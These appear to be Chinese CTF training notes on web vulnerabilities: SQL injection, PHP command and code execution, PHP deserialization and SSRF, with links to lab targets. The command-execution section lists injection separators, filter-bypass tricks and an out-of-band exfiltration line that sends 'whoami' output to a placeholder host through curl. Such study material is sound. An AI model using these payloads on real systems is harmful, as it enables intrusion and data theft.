### sql注入原理与进阶
知识点-对应练习:
- 万能密码  http://139.224.43.82:49154/index.php
- 常规sql注入-sqli-labs前俩关
- 报错注入-sqli-labs第五关 [[培训/报错注入]]
- 盲注(布尔盲注,时间盲注) [[培训/盲注脚本]] [[培训/[CISCN 2019华北Day2]Web1]] nssctf
- 堆叠注入-[[培训/强网杯 2019随便注]]
总结:sql语句拼接导致,预编译可直接阻止,但是预编译在order by存在时无法使用,此时只能过滤

练习:sqli-lab靶场
http://ip/sqli-labs/
[[通关流程]]
真题复现:


### php代码执行与命令执行
总结:
命令执行:
```
system()，passthru()，exec()，pcntl_exec()，shell_exec()，popen()/proc_popen()，反引号 ``
```
代码执行:
```
eval()，assert()，call_user_func()，create_function()，array_map()，call_user_func_array()，array_filter()，uasort()，preg_replace()
```
只要上述函数里的变量可控,即有可能存在漏洞

命令执行
```python
; ` & || | $()
#换行
%0A
#回车
%0d
#局部变量
a=l;b=s;$a$b
#curl 外带
curl `whoami`.xxx.com
```

关键词过滤
```python
ca\t fl\ag

```
练习:dvwa

真题复现:
[UUCTF 2022 新生赛]ez_rce [[培训/[UUCTF 2022 新生赛]ez_rce]]
[GXYCTF 2019]Ping Ping Ping nssctf [[培训/pingpingping]]
ctfshow命令执行大挑战
ciscn 2023 dumpit
sekaictf 2023 Scanner Service

### php反序列化综合
序列化示例代码
```php
<?php 
    class test
    {
        private $flag = "flag{233}";
        public $a = "aaa";
        static $b = "bbb";
    }

    $test = new test;
    $data = serialize($test);
    echo $data;
 ?>

```

键:数量:值

反序列化代码
```php
<?php 
    $str = 'O%3A4%3A%22test%22%3A2%3A%7Bs%3A10%3A%22%00test%00flag%22%3Bs%3A9%3A%22flag%7B233%7D%22%3Bs%3A1%3A%22a%22%3Bs%3A3%3A%22aaa%22%3B%7D';
    $data = urldecode($str);
    $obj = unserialize($data);

    var_dump($obj);
 ?>
```


练习:
[SWPUCTF 2021 新生赛]ez_unserialize

魔术方法
```php
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
...
```

练习: 
http://139.224.43.82:49156/

http://36.152.17.3:40024/


#### 进阶:
绕过__wakeup():
> 利用条件：
PHP5 < 5.6.25
​PHP7 < 7.0.10

当序列化字符串中表示对象属性个数的数字值大于真实类中属性的个数时就会跳过__wakeup的执行，
[[[SWPUCTF 2021 新生赛]no_wakeup]]


php反序列化字符串逃逸:

pop:
[[培训/[SWPUCTF 2021 新生赛]pop]]
[[培训/[NISACTF 2022]popchains]]
[[培训/[GDOUCTF 2023]反方向的钟]]
### ssrf(Server Side Request Forgery)服务端请求伪造
练习靶场
http://110.40.154.212/06/vul/ssrf/ssrf.php
https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost
真题:
[[培训/[NISACTF 2022]easyssrf]]
[[培训/[HNCTF 2022 WEEK2]ez_ssrf]]
[[培训/ctfshow351-360]]

http://username:password@localhost
